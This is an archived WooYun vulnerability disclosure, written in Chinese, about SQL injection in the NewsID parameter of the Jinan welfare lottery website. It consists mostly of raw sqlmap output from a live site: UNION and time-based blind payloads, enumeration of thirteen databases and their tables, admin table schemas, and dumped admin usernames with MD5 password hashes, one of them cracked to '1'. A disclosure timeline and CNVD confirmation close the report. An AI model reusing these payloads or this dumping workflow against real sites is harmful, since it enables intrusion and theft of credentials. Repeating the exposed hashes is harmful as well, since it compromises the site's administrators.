乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-05: 细节已通知厂商并且等待厂商处理中 2015-06-10: 厂商已经确认,细节仅向厂商公开 2015-06-20: 细节向核心白帽子及相关领域专家公开 2015-06-30: 细节向普通白帽子公开 2015-07-10: 细节向实习白帽子公开 2015-07-25: 细节向公众公开
上次是广东de。这次cmd5解密有账号没钱。 没劲后台
济南福彩网http://www.jnscp.cn/http://www.jnscp.cn/detailNews.jsp?NewsID=2645 (GET)
sqlmap identified the following injection points with a total of 88 HTTP(s) requests:---Parameter: NewsID (GET) Type: UNION query Title: MySQL UNION query (NULL) - 19 columns Payload: NewsID=2645 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7671,0x46564e66594849515267,0x716a787071),NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: NewsID=2645 AND SLEEP(5)---web application technology: JSPback-end DBMS: MySQL 5.0.11sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: NewsID (GET) Type: UNION query Title: MySQL UNION query (NULL) - 19 columns Payload: NewsID=2645 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7671,0x46564e66594849515267,0x716a787071),NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: NewsID=2645 AND SLEEP(5)---web application technology: JSPback-end DBMS: MySQL 5.0.11available databases [13]:[*] caipiaodata[*] examine[*] information_schema[*] jiaoyou[*] jiuxiang[*] jnsz[*] kptest[*] mysql[*] test[*] test2[*] wenliandata[*] yyzyhj[*] zldb
这儿多库目测只有[*] caipiaodata才是网站的其他是其他网站的具体其他什么网站我还不知道
Database: zldb+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| news | 52 || pic | 8 || news_kind | 4 || `user` | 1 |+---------------------------------------+---------+Database: wenliandata+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| log | 6797 || news | 1288 || specnews | 53 || bigclass | 39 || smallclass | 10 || specclass | 2 || admin | 1 || config | 1 |+---------------------------------------+---------+Database: jiuxiang+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| shop_area | 3162 || shop_city | 345 || shop_role_menu | 58 || shop_menu | 40 || shop_goods_attribute | 39 || shop_goods_category | 36 || shop_goods | 35 || shop_province | 34 || shop_order_goods | 32 || shop_order | 29 || shop_user | 21 || shop_user_detail | 21 || shop_image | 17 || shop_image_type | 15 || shop_category | 13 || shop_category_big | 13 || shop_user_addr | 11 || shop_goods_comm | 8 || shop_info_type | 7 || shop_paytype | 5 || sys_param | 5 || shop_adminlogin_hist | 4 || shop_role | 4 || shop_ask | 3 || shop_brand | 3 || shop_delivery | 3 || shop_goodscart | 3 || shop_model_attribute | 3 || shop_user_grad | 3 || shop_admin | 2 || shop_categorybig | 2 || shop_favorite | 2 || shop_info | 1 || shop_model | 1 || shop_provider | 1 || shop_store_in | 1 || shop_store_in_detail | 1 || system_param | 1 |+---------------------------------------+---------+Database: jnsz+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| enterprisedata | 496 || enterpriseinfo | 410 || sys_menu_role | 320 || sys_data_role | 62 || sys_dictionary | 54 || sys_menu | 35 || sys_userrole | 26 || sys_user | 22 || sys_role | 21 || sys_organization | 18 || sys_icon | 4 || sys_organizationrole | 4 || sys_userposition | 2 || sys_position | 1 || sys_positionrole | 1 |+---------------------------------------+---------+Database: jiaoyou+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| hyly | 23883 || log | 8276 || yyhy | 1519 || zxhy | 1056 || users | 857 || news | 277 || ykreg | 256 || eventregistration | 114 || links | 66 || hzhb | 57 || hyarea | 17 || yyvideo | 10 || bigclass | 9 || blinddates | 6 || yytype | 6 || alipay | 5 || paytype | 5 || message | 4 || admin | 1 || config | 1 |+---------------------------------------+---------+Database: yyzyhj+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| hyly | 15829 || log | 7746 || yyhy | 1260 || zxhy | 1036 || users | 840 || news | 242 || ykreg | 122 || eventregistration | 114 || hzhb | 57 || links | 35 || hyarea | 17 || yyvideo | 10 || bigclass | 9 || alipay | 6 || blinddates | 6 || yytype | 6 || paytype | 5 || message | 4 || admin | 1 || config | 1 |+---------------------------------------+---------+Database: examine+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| t_examineevaluate | 330771 || t_examinescore | 31955 || t_examineperson | 13068 || employee | 1287 || department | 168 || t_examinepublish | 91 || t_examinecontenta | 39 || t_examinecontent | 16 || unit | 12 || t_employeetype | 8 || employee_old | 7 || t_examinetable | 7 || `position` | 5 || t_examineindex | 5 || t_examinetype | 3 || admin | 2 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 2622 || STATISTICS | 410 || KEY_COLUMN_USAGE | 219 || TABLES | 202 || TABLE_CONSTRAINTS | 195 || COLLATION_CHARACTER_SET_APPLICABILITY | 126 || COLLATIONS | 126 || SCHEMA_PRIVILEGES | 114 || USER_PRIVILEGES | 105 || CHARACTER_SETS | 36 || SCHEMATA | 13 |+---------------------------------------+---------+Database: mysql+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| help_relation | 724 || help_topic | 458 || help_keyword | 378 || help_category | 36 || `user` | 9 || db | 8 |+---------------------------------------+---------+Database: kptest+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| t_examineevaluate | 162681 || t_examineperson | 4219 || t_examinescore | 192 || t_examinecontenta | 37 || t_employeetype | 8 || t_examinecontent | 8 || t_examinetable | 8 || employee_old | 7 || `position` | 5 || t_examineindex | 5 || department | 3 || employee | 3 || t_examinepublish | 3 || t_examinetype | 3 || admin | 2 || unit | 1 |+---------------------------------------+---------+Database: caipiaodata+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| log | 6497 || news | 2533 || message | 164 || bigclass | 22 || admin | 2 || config | 1 |+---------------------------------------+---------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: NewsID (GET) Type: UNION query Title: MySQL UNION query (NULL) - 19 columns Payload: NewsID=2645 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7671,0x46564e66594849515267,0x716a787071),NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: NewsID=2645 AND SLEEP(5)---web application technology: JSPback-end DBMS: MySQL 5.0.11Database: kptestTable: admin[6 columns]+----------------+-------------+| Column | Type |+----------------+-------------+| adminId | int(4) || adminLoginIP | varchar(30) || adminLoginTime | varchar(30) || adminName | varchar(50) || adminPwd | varchar(50) || role | varchar(10) |+----------------+-------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: NewsID (GET) Type: UNION query Title: MySQL UNION query (NULL) - 19 columns Payload: NewsID=2645 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7671,0x46564e66594849515267,0x716a787071),NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: NewsID=2645 AND SLEEP(5)---web application technology: JSPback-end DBMS: MySQL 5.0.11Database: kptestTable: admin[2 entries]+--------------------------------------+-----------+| adminPwd | adminName |+--------------------------------------+-----------+| C4CA4238A0B923820DCC509A6F75849B (1) | admin || 3069C374C533AE8D7928DA242B6A9825 | 寮犱笁 |+--------------------------------------+-----------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: NewsID (GET) Type: UNION query Title: MySQL UNION query (NULL) - 19 columns Payload: NewsID=2645 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7671,0x46564e66594849515267,0x716a787071),NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: NewsID=2645 AND SLEEP(5)---web application technology: JSPback-end DBMS: MySQL 5.0.11Database: caipiaodataTable: admin[18 columns]+---------------+-------------+| Column | Type |+---------------+-------------+| AddTime | varchar(20) || AdminID | int(11) || AdminName | varchar(32) || AdminPwd | varchar(64) || AdminType | smallint(6) || LastLoginIP | varchar(50) || LastLoginTime | varchar(50) || LoginNum | int(11) || NewsNum | int(11) || UserAddress | varchar(80) || UserBirthday | varchar(10) || UserEmail | varchar(50) || UserInfo | longtext || UserName | varchar(20) || UserQQ | varchar(10) || UserSex | char(2) || UserTel | varchar(50) || UserZip | varchar(6) |+---------------+-------------+
caipiaodata
UserName,AdminPwdadmin,31461AB060AFBB91E561047381356F5B啊啊啊啊,31461AB060AFBB91E561047381356F5B
kptest
adminPwd,adminNameC4CA4238A0B923820DCC509A6F75849B (1),admin3069C374C533AE8D7928DA242B6A9825,张三
危害等级:中
漏洞Rank:10
确认时间:2015-06-10 08:58
CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置.
暂无
